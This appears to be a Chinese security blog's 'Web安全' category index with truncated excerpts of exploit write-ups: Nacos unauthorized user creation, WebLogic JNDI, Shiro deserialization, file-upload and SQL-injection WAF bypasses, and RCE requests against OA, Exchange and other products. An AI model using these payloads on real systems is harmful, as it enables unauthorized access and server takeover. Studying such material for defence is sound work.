摘要:简介 影响: 未授权获得相关服务配置,泄露大量配置敏感信息 影响版本 Nacos <= 2.0.0-ALPHA.1 漏洞复现 post方式新增用户: POST /nacos/v1/auth/users?username=yangy&password=yangy HTTP/1.1 Host: XXX
阅读全文
随笔分类 - Web安全
摘要:简介 影响: 未授权获得相关服务配置,泄露大量配置敏感信息 影响版本 Nacos <= 2.0.0-ALPHA.1 漏洞复现 post方式新增用户: POST /nacos/v1/auth/users?username=yangy&password=yangy HTTP/1.1 Host: XXX
阅读全文
摘要:仅供本地代码学习,用于非法目的与本人无关 核心POC POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.hand
阅读全文
摘要:文件上传tips 文件名前缀加[0x09]绕过: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[0x09]test.asp” Content-Type:
阅读全文
摘要:基础 大小写 id=-1 uNIoN sELecT 1,2,3 双写 id=-1 UNIunionON SELselectECT 1,2,3 编码 id=1%252f%252a*/UNION%252f%252a /SELECT id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='
阅读全文
摘要:偶然某群内发现的好东西,做个转载分享 Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shir
阅读全文
摘要:##转载分享存档,仅供学习代码使用,用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul #EHole(棱洞)-红队重点攻击系统指纹探测工具 ##一、简介: ______ __ ______ / ____/___/ /___ __
阅读全文
摘要:##转载分享存档,仅供学习代码使用,用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul ##一、OA系统 ####泛微(Weaver-Ecology-OA) 🔸 泛微OA E-cology RCE(CNVD-2019-3220
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 POST /dolphinscheduler/users/update id=1&userName=admin&userPassword=Passwor
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###提供工具仅供技术学习交流、请勿用于非法行为、否则后果自负。 ###文章中涉及的工具将及时补充进该页面,原文格式较乱,现以Markdown格式重新发布,将持续更新。
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###EXP java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###漏洞简介 只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令 相关介绍https://portal.msrc.microsoft.co
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###漏洞简介 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到X
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###漏洞简介 此漏洞使远程攻击者可以在受影响的Horde Groupware Webmail Edition安装上执行任意代码。利用身份验证才能利用此漏洞。具体缺陷存
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 ###大致模样 ###构造数据包 POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxx
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 访问http://127.0.0.1/listener/cluster_manage.php 返回 "OK" 访问如下链接即可getshell,执行成功
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以此下载相关敏感文件 ###构造如下语句 ht
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 ###对响应包进行修改,将false更改为true ###可以获得泄露的管理用户md5值密码 ###利用md5值去登录页面 ###效果如下 成功登录,登
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###EXP POST /acc/clsf/report/datasource.php HTTP/1.1 Host: x.x.x.x Connection: close
阅读全文
摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###EXP POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form
阅读全文
|